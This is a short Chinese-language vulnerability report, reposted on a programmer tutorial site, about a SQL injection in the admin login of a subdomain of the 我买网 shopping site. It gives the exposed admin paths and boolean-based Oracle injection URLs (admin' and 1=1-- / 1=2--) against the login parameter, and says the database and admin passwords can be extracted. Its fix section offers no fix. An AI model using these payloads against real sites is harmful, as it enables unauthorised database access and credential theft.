好得很程序员自学网

<tfoot draggable='sEl'></tfoot>

我买网某分站后台注入 - 网站安全 - 自学php

首先是后台地址泄漏

http://tuan.womai测试数据/groupBuy/listOrderManage.jsp

 

后台登陆地址:

http://tuan.womai测试数据/login.jsp

登陆处存在 oracle 注入

http://tuan.womai测试数据/j_spring_security_check?j_password=a&j_username=admin' and 1=1--

http://tuan.womai测试数据/j_spring_security_check?j_password=a&j_username=admin' and 1=2--

根据反回的信息不同,存在注入。

 

查 数据库 名:

 

 

查表

 

 

这里就不深入了,查出管理员用户密码进入管理后台。或者直接是获取数据库同容了,危害应该比较大。

修复方案:

都懂得!

查看更多关于我买网某分站后台注入 - 网站安全 - 自学php的详细内容...

声明:本文来自网络,不代表【好得很程序员自学网】立场,转载请注明出处:http://haodehen.cn/did13348
  阅读:51次

上一篇: TP-Link官方商城支付漏洞及修复 - 网站安全 - 自学

下一篇:开心网android客户端暴力破解漏洞 - 网站安全 - 自